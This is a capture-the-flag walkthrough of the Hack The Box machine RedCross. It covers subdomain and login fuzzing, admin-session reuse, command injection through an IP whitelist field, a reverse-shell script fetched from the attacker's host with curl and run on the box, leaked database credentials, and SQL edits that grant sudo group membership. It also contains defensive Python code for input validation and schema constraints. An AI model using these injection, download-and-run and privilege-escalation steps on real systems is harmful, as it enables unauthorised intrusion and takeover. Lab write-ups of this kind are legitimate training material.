
Hack The Box - RedCross

source link: https://www.tuicool.com/articles/hit/BvEnQn6

Quick Summary

Hey guys, today RedCross retired and here is my write-up about it. To get an initial shell on this box there are two ways: the first one is to exploit an authenticated RCE, which gives you a shell as www-data, then escalate to root. The second way is to exploit a vulnerable SMTP server called Haraka to get a shell as user, then escalate to root. Both of the ways were fun and I liked this box. It’s a medium-rated Linux box and its IP is 10.10.10.113; I added it to /etc/hosts as redcross.htb. Let’s jump right in!


Nmap

As always we will start with nmap to scan for open ports and services :

nmap -sV -sT -sC redcross.htb

Port 22 is open and running SSH, and there’s HTTP and HTTPS on ports 80 and 443. As always we will check HTTP.

HTTP Initial Enumeration

By going to http://redcross.htb it redirects us to https://intra.redcross.htb


I added intra.redcross.htb to /etc/hosts next to the IP of the box, which is 10.10.10.113:


Let’s go to intra.redcross.htb again :


Before doing anything I wanted to see if there are any other subdomains, so I used wfuzz with subdomains-top1mil-5000.txt from SecLists:

wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

Responses for non-existing subdomains are 28 words long, so I stopped the scan and added --hw 28 to filter them out:

wfuzz -c -w subdomains-top1mil-5000.txt --hw 28 -H "HOST:FUZZ.redcross.htb" https://redcross.htb

And we got admin.redcross.htb, so I added it to /etc/hosts:


Note: normally, to test a subdomain there has to be an entry for it in /etc/hosts that points to the IP of the box. Sending the candidate name in the Host header instead ( -H "HOST:FUZZ.redcross.htb" ) avoids that, because the web server picks the virtual host from that header.

Now let’s go to admin.redcross.htb and see what’s there :


It asks for a login; we will get into this later, but let’s go back to intra.redcross.htb and see what we can do from there.


We need to log in. I tried to brute-force the login with wfuzz, so I intercepted the request with Burp to see the parameters:


Then I used wfuzz like before (filtering out responses with 32 chars). I used a small list of common credentials like admin:admin, top-usernames-shortlist.txt from SecLists.

wfuzz -c --hh 11 -u "https://intra.redcross.htb/pages/actions.php" -X POST -d "user=FUZZ&pass=FUZZ&action=login" -w top-usernames-shortlist.txt

guest:guest gave us a different response. Let’s try it:


And it worked. We see this message:

From: admin (uid 1)	To: guest (uid 5)

You're granted with a low privilege access while we're processing your credentials request. Our messaging system still in beta status. Please report if you find any incidence.

Broken Session Management, Admin Panel

After some enumeration I found that, once authenticated as guest on intra.redcross.htb, the same session ID is accepted on admin.redcross.htb:


Now we have access to the admin panel. There are two areas: User Management and Network Access.

User Management:


Can we really add users? Let’s try it with a user named test:


Nice, it gave us the credentials. Let’s try SSH:


And it worked, but it seems like we are not on the actual host; we are in a container or a jail. Let’s look at /home:


interface_data and public? The last thing I checked was /etc/passwd to look for any possible users:


There’s a user called penelope, but no /home directory for penelope. So I gave up on this and looked at Network Access:


I added my IP address to the whitelist:


Then I scanned the box with nmap again to see if any new ports show up:


There’s FTP on port 21 (anonymous login not allowed), a PostgreSQL database on port 5432 and a service on port 1025 that nmap couldn’t really identify. Now there are two ways to continue; I will show the RCE first.

RCE on admin.redcross.htb, Reverse Shell as www-data

In the Network Access section you can add and remove IPs from the whitelist. I added a random IP, let’s say 11.11.11.11, and intercepted the two requests with Burp:


Allow request:


Response:


Deny request:


Response:


We notice that it says Executing iptables, so the IP we provide becomes part of a system command. I added |ls to the ip parameter in the deny request and got this response:
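As an added illustration (not code from the write-up or from the RedCross box itself), this is how the whitelist handler should treat the ip parameter: parse it as exactly one IPv4 address and hand the result to iptables as its own argv element with no shell involved, so an input like 11.11.11.11|ls is refused before any command is built. The rule shape (INPUT chain, ACCEPT target) and the sample inputs are assumptions.

```python
import ipaddress
import subprocess

# Constructed sample inputs: the first two are what a normal client sends,
# the rest are shaped like the "|ls" injection attempt described above.
SAMPLE_INPUTS = ["10.10.14.5", " 10.10.14.5 ", "11.11.11.11|ls",
                 "11.11.11.11; id", "$(id)", ""]


def parse_ipv4(raw: str) -> str:
    """Return the canonical text of exactly one IPv4 address, or raise ValueError.

    IPv4Address accepts nothing but dotted-quad syntax, so shell metacharacters,
    hostnames and empty strings all fail here instead of reaching a command line."""
    return str(ipaddress.IPv4Address(raw.strip()))


def is_safe_ip(raw: str) -> bool:
    try:
        parse_ipv4(raw)
        return True
    except ValueError:
        return False


def build_iptables_argv(action: str, raw_ip: str) -> list:
    """Build the iptables argument list (assumed rule shape: INPUT chain, ACCEPT target).

    The address becomes one argv element and no shell ever parses it, so a
    separator such as '|' or ';' cannot turn it into a second command."""
    if action not in ("allow", "deny"):
        raise ValueError("unknown action: %r" % action)
    ip = parse_ipv4(raw_ip)
    flag = "-I" if action == "allow" else "-D"  # insert the rule, or delete it
    return ["iptables", flag, "INPUT", "-s", ip, "-j", "ACCEPT"]


def apply_rule(action: str, raw_ip: str, runner=subprocess.run):
    """Run iptables without shell=True; `runner` is injectable so tests need no root."""
    return runner(build_iptables_argv(action, raw_ip), check=True, capture_output=True)


def classify_samples() -> dict:
    """Map each constructed sample input to whether the validator accepts it."""
    return {raw: is_safe_ip(raw) for raw in SAMPLE_INPUTS}


if __name__ == "__main__":
    for raw, ok in classify_samples().items():
        print("%-20r -> %s" % (raw, "accepted" if ok else "rejected"))
```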


Nice, we have an RCE. Let’s get a reverse shell: I created a reverse shell script and called it shell.sh:


Then I hosted it with Python’s built-in HTTP server and downloaded it on the box: curl http://10.10.xx.xx/shell.sh > /tmp/shell.sh


Python server:


Let’s verify that the shell is on the box:


Nice, let’s execute it:

bash /tmp/shell.sh

We got a shell as www-data:


And we see in /home a directory for penelope, but we can’t read the user flag.


Hardcoded PostgreSQL Database Credentials, Privilege Escalation to root

In the root directory of the web application there’s an interesting PHP file called actions.php. Interesting because it handles everything; we saw it earlier in all the POST requests. I looked into it and found credentials for a DB user called unixusrmgr:


if($action==='del'){
        header('refresh:1;url=/?page=users');
        $uid=$_POST['uid'];
        $dbconn = pg_connect("host=10.10.10.113 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
        $result = pg_prepare($dbconn, "q1", "delete from passwd_table where uid = $1");
        $result = pg_execute($dbconn, "q1", array($uid));
        echo "User account deleted";
}

We knew earlier that the database is PostgreSQL, so let’s connect. Some cheat sheets for PostgreSQL: one on GitHub and postgresqltutorial.com.

psql -h 127.0.0.1 -d unix -U unixusrmgr

\dt lists the tables:


I ran select * from passwd_table; and got some users with their password hashes and other info, so I went back to the admin panel and added a user called rick:


Then I ran select * from passwd_table; again:


We notice that the homedir is set to /var/jail/home, which is why the created users can’t access the actual host. Also the gid is set to 1001. Let’s set that to 0 (root):

update passwd_table set gid=0 where gid=1001;

Now the gid is 0:


Let’s also change the homedir:

update passwd_table set homedir='/home' where homedir='/var/jail/home';

Let’s log in with SSH again:


Checking our gid:


It’s root, but we still can’t read the flags:


We also can’t use sudo:


Weird. I checked /etc/sudoers and saw this line:


If we get the gid of the sudo group, we will be able to run sudo.

cat /etc/group | grep sudo

The gid is 27, so let’s return to the database and change our gid from 0 to 27:

update passwd_table set gid=27 where gid=0;

select * from passwd_table;

Great, let’s terminate our SSH connection and log in again. We are now a member of sudo and we can run sudo, so sudo su will give us a root shell.
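The gid and homedir edits above only worked because the application’s database role could rewrite any column of the table that backs the system’s user database. As an added, defender-side example (not the box’s own schema; only uid, gid and homedir are named in the write-up, the other columns are assumed placeholders), the following keeps the rows the web role manages inside the jail with CHECK constraints, so the exact UPDATEs run above are refused. sqlite3 stands in for PostgreSQL so it runs offline; the CHECK syntax is the same in both.

```python
import sqlite3

JAIL_HOME = "/var/jail/home"

# Assumed schema. The constraints are the point: uid/gid can never fall into
# the system range (0 = root, 27 = sudo on this box) and homedir can never
# leave the jail, whoever issues the UPDATE.
SCHEMA = """
CREATE TABLE passwd_table (
    username TEXT PRIMARY KEY,
    passwd   TEXT NOT NULL,
    uid      INTEGER NOT NULL UNIQUE CHECK (uid >= 1000),
    gid      INTEGER NOT NULL CHECK (gid >= 1000),
    homedir  TEXT NOT NULL CHECK (homedir = '/var/jail/home'
                                  OR homedir LIKE '/var/jail/home/%'),
    shell    TEXT NOT NULL DEFAULT '/bin/bash'
);
"""


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def try_exec(conn, sql, params=()) -> bool:
    """Run one statement; return False if a constraint rejected it (and roll back)."""
    try:
        with conn:
            conn.execute(sql, params)
        return True
    except sqlite3.IntegrityError:
        return False


def demo() -> dict:
    """Replay the write-up's steps against the constrained table."""
    conn = open_db()
    results = {
        # the admin panel's own INSERT: a jailed user, as the app intends (constructed hash)
        "insert_rick": try_exec(conn,
            "INSERT INTO passwd_table (username, passwd, uid, gid, homedir) VALUES (?, ?, ?, ?, ?)",
            ("rick", "$6$constructed$hash", 1005, 1001, JAIL_HOME)),
        # the three privilege-escalation UPDATEs from the write-up, now refused
        "set_gid_0": try_exec(conn, "UPDATE passwd_table SET gid = 0 WHERE gid = 1001"),
        "set_gid_27": try_exec(conn, "UPDATE passwd_table SET gid = 27 WHERE gid = 1001"),
        "set_home": try_exec(conn, "UPDATE passwd_table SET homedir = '/home' WHERE homedir = ?",
                             (JAIL_HOME,)),
    }
    results["rick_row"] = conn.execute(
        "SELECT uid, gid, homedir FROM passwd_table WHERE username = 'rick'").fetchone()
    return results
```

In PostgreSQL the constraints are written the same way; on top of them the web role should get INSERT and DELETE on the table rather than a blanket UPDATE, and where an UPDATE is needed PostgreSQL can grant it per column (GRANT UPDATE (passwd) ON passwd_table TO unixusrmgr) so gid and homedir stay out of reach.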

